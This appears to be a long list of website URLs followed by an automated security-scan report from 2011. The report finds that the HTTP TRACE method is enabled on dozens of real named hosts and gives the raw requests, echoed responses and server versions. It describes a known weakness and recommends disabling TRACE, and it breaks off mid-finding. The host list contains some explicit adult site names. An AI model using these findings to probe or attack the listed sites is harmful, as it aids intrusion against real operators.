http://www.kensington.com/
http://www.kerbeck.com/
http://www.kerpoof.com/
http://www.khsaa.org/
http://www.kibagames.com/
http://www.kicker.com/
http://www.kidsthemebedrooms.com/
http://www.kikkomanusa.com/
http://www.kissladyboy.com/
http://www.klicer.com/
http://www.knife-depot.com/
http://www.knitlist.com/
http://www.kstatecollegian.com/
http://www.kungfumagazine.com/
http://www.kzzp.com/
http://www.lacoste.com/
http://www.lake-county-fair.com/
http://www.lakecompounce.com/
http://www.lakeplace.com/
http://www.laobserved.com/
http://www.laptopical.com/
http://www.lasalle.edu/
http://www.latinspicebabes.com/
http://www.lattc.edu/
http://www.laurellkhamilton.org/
http://www.leadsonline.eu/
http://www.legendamateurs.com/
http://www.lespac.com/
http://www.levolor.com/
http://www.libraryspot.com/
http://www.like-em-straight.com/
http://www.likeulo.us/
http://www.lilydouce.com/
http://www.littlebigplanet.com/
http://www.livesoccertv.com/
http://www.livingontheedge.org/
http://www.llli.org/
http://www.lmsal.com/
http://www.lmtribune.com/
http://www.localjobs101.com/
http://www.logler.com/
http://www.longhaircommunity.com/
http://www.lookoutlanding.com/
http://www.luminous-landscape.com/
http://www.makefive.com/
http://www.manchester2002-uk.com/
http://www.mangahead.com/
http://www.manhattanapts.com/
http://www.maniactools.com/
http://www.manycam.com/
http://www.mature-better.com/
http://www.maxadds.com/
http://www.maxdome.de/
http://www.mayohealthsystem.org/
http://www.mayura.com/
http://www.mazda6club.com/
http://www.mbn.com.ua/
http://www.mbon.org/
http://www.mbrgames.com/
http://www.mcc.edu/
http://www.medicaiddentistry.com/
http://www.mgexperience.net/
http://www.michaelschenkerhimself.com/
http://www.michie.com/
http://www.midlandstech.edu/
http://www.minglehouse.com/
http://www.mini001.com/
http://www.mirandalambert.com/
http://www.mobilerider.com/
http://www.momsgiveass.com/
http://www.monica.com/
http://www.montanalottery.com/
http://www.monticello.org/
http://www.motorbicycling.com/
http://www.mp3hustle.com/
http://www.mrclean.com/
http://www.mtsac.edu/
http://www.muralsforkids.com/
http://www.muskingum.edu/
http://www.mydivadoll.com/
http://www.myefficientplanet.com/
http://www.myfreedegree.com/
http://www.myglobalsearch.com/
http://www.mynetworktv.com/
http://www.mytones.us/
http://www.myweddingvows.com/
http://www.nahanniriverherbs.com/
http://www.naturalhealers.com/
http://www.nbc.ca/
http://www.neric.org/
http://www.net-mine.com/
http://www.newamateurtube.com/
http://www.newverhost.com/
http://www.nextstat.com/
http://www.nightmarefactory.com/
http://www.nikonians.org/
http://www.nin.com/
http://www.noah-health.org/
http://www.northerntrust.com/
http://www.nrlc.org/
http://www.nsaahome.org/
http://www.nsk-sys.com/
http://www.nudism.ws/
http://www.nuffnang.com.au/
http://www.nutone.com/
http://www.oaktreevintage.com/
http://www.oceana.org/
http://www.okhistory.org/
http://www.old-yearbooks.com/
http://www.oldchevytruck.com/
http://www.olthmqe.com/
http://www.onesourcetalent.com/
http://www.onlineatlas.us/
http://www.onlinebankchecking.com/
http://www.onlinecustomersurvey.com/
http://www.onlineradiostations.com/
http://www.ontargetpayday.com/
http://www.orlandoairports.net/
http://www.oxaes.com/
http://www.pageranktop.com/
http://www.paintballforum.com/
http://www.pasadena.edu/
http://www.pay-dayin60seconds.net/
http://www.paydayin-60seconds.com/
http://www.pecentral.org/
http://www.penisadvantage.com/
http://www.pepperfool.com/
http://www.perfectgirlsclub.com/
http://www.pervyernies.com/
http://www.philstart.com/
http://www.phobialist.com/
http://www.photos-naturistes.fr/
http://www.pianostreet.com/
http://www.picturesofengland.com/
http://www.piworld.com/
http://www.pixela.co.jp/
http://www.plan3d.com/
http://www.playingforchange.com/
http://www.poetv.com/
http://www.poker.com/
http://www.pollhost.com/
http://www.powerboatlistings.com/
http://www.prensaescrita.com/
http://www.prettynylonfeet.com/
http://www.primeretailmail.com/
http://www.printsmadeeasy.com/
http://www.promarkresearch.com/
http://www.prototype-ui.com/
http://www.prudentialhomesale.com/
http://www.publicbookshelf.com/
http://www.purehockey.com/
http://www.qkype.com/
http://www.quizasaurus.com/
http://www.quizulous.com/
http://www.rapescenes.net/
http://www.rateitsearch.com/
http://www.rats2u.com/
http://www.rauantiques.com/
http://www.raylamontagne.com/
http://www.rb-hosting.de/
http://www.readymobile.com/
http://www.realemoexposed.com/
http://www.realestate-mls.com/
http://www.realfreevids.com/
http://www.reallycute.net/
http://www.realwebaudio.com/
http://www.recetasgratis.net/
http://www.redhairedteens.com/
http://www.refundsweepers.com/
http://www.relylocal.com/
http://www.rentawreck.com/
http://www.reversehelpline.us/
http://www.revues.org/
http://www.ricedelman.com/
http://www.rickystokesnews.com/
http://www.ridemysecretary.com/
http://www.rigolus.com/
http://www.ringtonefav.net/
http://www.riverfacts.com/
http://www.rogerssportinggoods.com/
http://www.romanticasheville.com/
http://www.ronstire.com/
http://www.rp-online.de/
http://www.rr-bb.com/
http://www.runningroom.com/
http://www.rvntracker.com/
http://www.rvsurplus.net/
http://www.s3xads.com/
http://www.sa-venues.com/
http://www.salespider.com/
http://www.samsontech.com/
http://www.sanfranrecruiter.com/
http://www.save2pc.com/
http://www.scenes-of-seduction.com/
http://www.schoolexpress.com/
http://www.scrapbookingtop50.com.au/
http://www.scrapjazz.com/
http://www.searchlab.info/
http://www.seat42f.com/
http://www.sevensidedcube.net/
http://www.seventhsanctum.com/
http://www.shareavenue.com/
http://www.sharpened.net/
http://www.shazo.com/
http://www.shopgala.com/
http://www.shopovertime.com/
http://www.shopthepig.com/
http://www.simpleanddelicious.com/
http://www.skillsurvey.com/
http://www.slicklegs.com/
http://www.slotsjam.com/
http://www.smarthomeusa.com/
http://www.smccme.edu/
http://www.socialsecurityhop.com/
http://www.soflens.com/
http://www.solar-aid.org/
http://www.sololadyboys.com/
http://www.soundsearch.com/
http://www.southpointcasino.com/
http://www.spaceflightnow.com/
http://www.spankwireinhd.com/
http://www.spearboard.com/
http://www.speedingupmypc.com/
http://www.speedysigns.com/
http://www.sportbikes.net/
http://www.squirt-disgrace.net/
http://www.startec.com/
http://www.sterndrive.info/
http://www.stocking-cuties.com/
http://www.stockingsjerk.com/
http://www.straight.com/
http://www.stroudsrestaurant.com/
http://www.stservicemovie.com/
http://www.suelebeau.com/
http://www.sunday-school-fun-zone.com/
http://www.supermotors.net/
http://www.suppview.com/
http://www.surnamesite.com/
http://www.survey.com/
http://www.surveyqlik.com/
http://www.survivaltopics.com/
http://www.sweetness-light.com/
http://www.sxtracking.com/
http://www.sybian.com/
http://www.sztaki.hu/
http://www.tapartoche.com/
http://www.targetx.com/
http://www.tattooingmovies.com/
http://www.taylortrue.com/
http://www.tcoasttalk.com/
http://www.tcsoal.org/
http://www.techgage.com/
http://www.teenburggirls.com/
http://www.teenloveholes.com/
http://www.teensnu.com/
http://www.tempcredit.com/
http://www.teriskitchen.com/
http://www.texasbowhunter.com/
http://www.thaiteenager.com/
http://www.thecitizen.com/
http://www.theclassof1979.org/
http://www.thefashionpolice.net/
http://www.thefedoralounge.com/
http://www.thefwa.com/
http://www.thelaughtermovie.com/
http://www.themag12.com/
http://www.themanschoice.com/
http://www.themaxtube.com/
http://www.theminiaturespage.com/
http://www.thepotteries.org/
http://www.therumpus.net/
http://www.thetelegram.com/
http://www.thewitcher.com/
http://www.thorgaming.com/
http://www.ticalc.org/
http://www.ticketstub.com/
http://www.tight18yos.com/
http://www.tinythongpanties.com/
http://www.tireteam.com/
http://www.tldm.org/
http://www.top20cool.com/
http://www.totalassault.com/
http://www.toxel.com/
http://www.trade2win.com/
http://www.traffic-find.com/
http://www.travelagentcentral.com/
http://www.travour.com/
http://www.triumphrat.net/
http://www.trustedhomeservices.com/
http://www.tubedaddy.net/
http://www.tubefish.org/
http://www.tubeguide.info/
http://www.tucsonweekly.com/
http://www.tunecore.com/
http://www.turnbacktogod.com/
http://www.twodicksinhisass.com/
http://www.ultimate-penis-enlargement-guide.com/
http://www.umassonline.net/
http://www.umc.edu/
http://www.uniquerewards.com/
http://www.unitedfcu.com/
http://www.unsub-me.com/
http://www.uprinting.com/
http://www.upskirtphotos.org/
http://www.urbanministry.org/
http://www.urnotalone.com/
http://www.usa-gymnastics.org/
http://www.usacitiesonline.com/
http://www.usafootball.com/
http://www.usagardener.com/
http://www.usapaydayassistance.net/
http://www.uscashwire.com/
http://www.uschess.org/
http://www.usedforsale.biz/
http://www.userfriendly.org/
http://www.usgo.org/
http://www.usherbrooke.ca/
http://www.utopiandirect.com/
http://www.vacationrentalsad.com/
http://www.vanguardmil.com/
http://www.vectormarketing.com/
http://www.veoliaes-sw.com/
http://www.verawang.com/
http://www.vertadnet.com/
http://www.videora.com/
http://www.visitmaine.net/
http://www.vitrue.com/
http://www.vividfeeds.com/
http://www.vividracing.com/
http://www.vladtod.com/
http://www.wafbhomes.com/
http://www.wagnerspraytech.com/
http://www.watchforeclosure.com/
http://www.web-source.net/
http://www.webcampromotions.com/
http://www.webdesign.org/
http://www.weebls-stuff.com/
http://www.wellnessletter.com/
http://www.welt-atlas.de/
http://www.werdyo.com/
http://www.westendmotorsports.com/
http://www.westport-news.com/
http://www.wetmaturevids.com/
http://www.whatsonxiamen.com/
http://www.wheelessonline.com/
http://www.wholesaledir.com/
http://www.wikifeet.com/
http://www.wildwoodsnj.com/
http://www.windows-fast.com/
http://www.windows-new.com/
http://www.winnipesaukee.com/
http://www.wmost.com/
http://www.womeninthebible.net/
http://www.womensenews.org/
http://www.wonderbackgrounds.com/
http://www.woodcraftplans.com/
http://www.wordplays.com/
http://www.workfromhomenews6.com/
http://www.worksourceoregon.org/
http://www.wri.org/
http://www.wwwamericanclassifieds.com/
http://www.x-y.net/
http://www.xaapa.com/
http://www.xlasians.com/
http://www.xoticpc.com/
http://www.xr77.com/
http://www.yankeefoliage.com/
http://www.ymlp163.com/
http://www.ymlp188.com/
http://www.yourinsights.net/
http://www.youthfire.com/
http://www.zapak.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

22.1. http://ads.specificmedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.specificmedia.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads.specificmedia.com
Cookie: bc44d028a597022b

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:11 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.specificmedia.com
Cookie: bc44d028a597022b

22.2. http://bh.contextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 6b630c1acd255a83

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Content-Type: message/http
Content-Length: 130
Date: Tue, 03 May 2011 15:41:30 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 6b630c1acd255a83
connection: Keep-Alive
cw-userhostaddress: 173.193.214.243

22.3. http://cache.specificmedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cache.specificmedia.com
Cookie: 8ad292d3c3d1435

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:14 GMT
Server: PWS/1.7.2.1
X-Px: nc iad-agg-n27 ( origin>CONN)
Content-Length: 359
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: ads.specificmedia.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n27.panthercdn.com PWS/1.7.2.1
X-Forwarded-For: 173.193.214.243, 66.114.52.37
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://cache.specificmedia.com/
Cookie: 8ad292d3c3d1435
Connection: keep-alive

22.4. http://d.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: a3445384cbd29a47

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 15:41:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: a3445384cbd29a47

22.5. http://domainunion.de/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://domainunion.de
Path:	/

Request

TRACE / HTTP/1.0
Host: domainunion.de
Cookie: 687b29740ce00085

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 20:26:05 GMT
Server: Apache/1.3.33 (Unix) PHP/5.2.5 mod_ssl/2.8.23 OpenSSL/0.9.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 687b29740ce00085
Host: domainunion.de

22.6. http://image2.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: a009431d2d1cda7c

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:35 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: a009431d2d1cda7c

22.7. http://leeenterprises.112.2o7.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leeenterprises.112.2o7.net
Path:	/

Request

TRACE / HTTP/1.0
Host: leeenterprises.112.2o7.net
Cookie: e6db94833fb28983

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:48 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: leeenterprises.112.2o7.net
Cookie: e6db94833fb28983
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

22.8. http://pixel.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 9f14be3ad32d3cbb

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:39 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 9f14be3ad32d3cbb
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

22.9. http://r.openx.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: c1eead172ca7bc72

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:38 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: c1eead172ca7bc72
X-Forwarded-For: 173.193.214.243

22.10. http://tags.bluekai.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: c969e6d8347af4c0

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 15:41:32 GMT
Content-Type: message/http
Connection: close

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: c969e6d8347af4c0
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200

22.11. http://www.1-800-volunteer.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.1-800-volunteer.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.1-800-volunteer.org
Cookie: cde276843710363c

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:56 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.1-800-volunteer.org
Cookie: cde276843710363c

22.12. http://www.123-reg.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.123-reg.co.uk
Path:	/

Request

TRACE / HTTP/1.0
Host: www.123-reg.co.uk
Cookie: 5355d275d934fce2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:40 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.123-reg.co.uk
Cookie: 5355d275d934fce2

22.13. http://www.1280.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.1280.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.1280.com
Cookie: f4d0f1cedf9d21dc

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:26 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.1280.com
Cookie: f4d0f1cedf9d21dc

22.14. http://www.20minutos.es/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.20minutos.es
Path:	/

Request

TRACE / HTTP/1.0
Host: www.20minutos.es
Cookie: a56a64c5dd152088

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 143
Date: Tue, 03 May 2011 11:06:37 GMT
X-Varnish: 482945420
Age: 0
Via: 1.1 varnish
Connection: close
X-20M-Cache: 01

TRACE / HTTP/1.0
Host: www.20minutos.es
Cookie: a56a64c5dd152088
X-Forwarded-For: 173.193.214.243, 173.193.214.243
X-Varnish: 482945420

22.15. http://www.2benet.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.2benet.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.2benet.net
Cookie: b96414298689d3a5

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:17 GMT
Server: Apache/2.2.16 (FreeBSD) DAV/2 PHP/5.2.14 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.2benet.net
Cookie: b96414298689d3a5

22.16. http://www.321gold.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.321gold.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.321gold.com
Cookie: ffbc12fe06a5fc38

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:06 GMT
Server: Apache/2.2.0 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.321gold.com
Cookie: ffbc12fe06a5fc38

22.17. http://www.321search.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.321search.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.321search.com
Cookie: 556feb77aaccef96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.321search.com
Cookie: 556feb77aaccef96

22.18. http://www.3happybytes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.3happybytes.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.3happybytes.com
Cookie: ff9b49357067ea03

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:22:31 GMT
Server: Apache
Content-Type: message/http
Vary: Accept-Encoding,User-Agent
Connection: close

TRACE / HTTP/1.1
Host: www.3happybytes.com
Cookie: ff9b49357067ea03
X-Forwarded-For: 173.193.214.243, 173.193.214.243
X-Varnish: 191574567
X-Forwarded-Host: www.3happybytes.com
X-Forwarded-Server: *
Connection: Keep-Alive

22.19. http://www.3reef.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.3reef.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.3reef.com
Cookie: 72c25641072883c1

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:26 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.3reef.com
Cookie: 72c25641072883c1

22.20. http://www.48hourcashsystem.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.48hourcashsystem.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.48hourcashsystem.com
Cookie: 880153bbb7e5bc23

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.48hourcashsystem.com
Cookie: 880153bbb7e5bc23

22.21. http://www.4m.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4m.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.4m.net
Cookie: 1eac5c8baeec3173

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:28 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.4m.net
Cookie: 1eac5c8baeec3173

22.22. http://www.a-russian-girl.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.a-russian-girl.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.a-russian-girl.com
Cookie: d058a3ca98633907

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.15
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.a-russian-girl.com
Cookie: d058a3ca98633907

22.23. http://www.abbee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abbee.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.abbee.com
Cookie: 7b909f9b16338012

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:09 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.abbee.com
Cookie: 7b909f9b16338012

22.24. http://www.aboutarc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aboutarc.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.aboutarc.com
Cookie: ff8fa7f74dfb8568

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:57 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aboutarc.com
Cookie: ff8fa7f74dfb8568

22.25. http://www.aboutnursing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aboutnursing.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.aboutnursing.com
Cookie: 35016e20c5d3441d

Response

22.26. http://www.abzolute.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abzolute.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.abzolute.net
Cookie: eeda814211b06611

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.abzolute.net
Cookie: eeda814211b06611

22.27. http://www.actionsearch.info/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.actionsearch.info
Path:	/

Request

TRACE / HTTP/1.0
Host: www.actionsearch.info
Cookie: dbf595c868f7524b

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:28 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.actionsearch.info
Cookie: dbf595c868f7524b

22.28. http://www.activehire.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.activehire.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.activehire.com
Cookie: 8b516af1b374cceb

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.activehire.com
Cookie: 8b516af1b374cceb

22.29. http://www.adddev2.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adddev2.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.adddev2.com
Cookie: 6d41d92be3b7edf

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.adddev2.com
Cookie: 6d41d92be3b7edf

22.30. http://www.addgfs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addgfs.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.addgfs.com
Cookie: 4368217fe11c33b0

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:55 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.addgfs.com
Cookie: 4368217fe11c33b0

22.31. http://www.adhostingsolutions.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adhostingsolutions.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.adhostingsolutions.com
Cookie: c208888fcb23cb83

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:01 GMT
Server: Apache/1.3.39 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.30 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: c208888fcb23cb83
Host: www.adhostingsolutions.com

22.32. http://www.adnet.de/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adnet.de
Path:	/

Request

TRACE / HTTP/1.0
Host: www.adnet.de
Cookie: ae1e1a161f9c0ab7

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:33 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.adnet.de
Cookie: ae1e1a161f9c0ab7

22.33. http://www.aerotrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aerotrader.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.aerotrader.com
Cookie: 7628f929ec965ef5

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:58 GMT
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aerotrader.com
Cookie: 7628f929ec965ef5

22.34. http://www.afciviliancareers.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.afciviliancareers.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.afciviliancareers.com
Cookie: 8ae33e4e022d89aa

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:48 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.afciviliancareers.com
Cookie: 8ae33e4e022d89aa

22.35. http://www.afibstroke.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.afibstroke.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.afibstroke.com
Cookie: d0ae331da46f455

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:04 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.afibstroke.com
Cookie: d0ae331da46f455

22.36. http://www.agathachristie.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.agathachristie.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.agathachristie.com
Cookie: 957c61d7953ba82

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.agathachristie.com
Cookie: 957c61d7953ba82

22.37. http://www.agingeye.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.agingeye.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.agingeye.net
Cookie: ca7605110984b96c

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:32 GMT
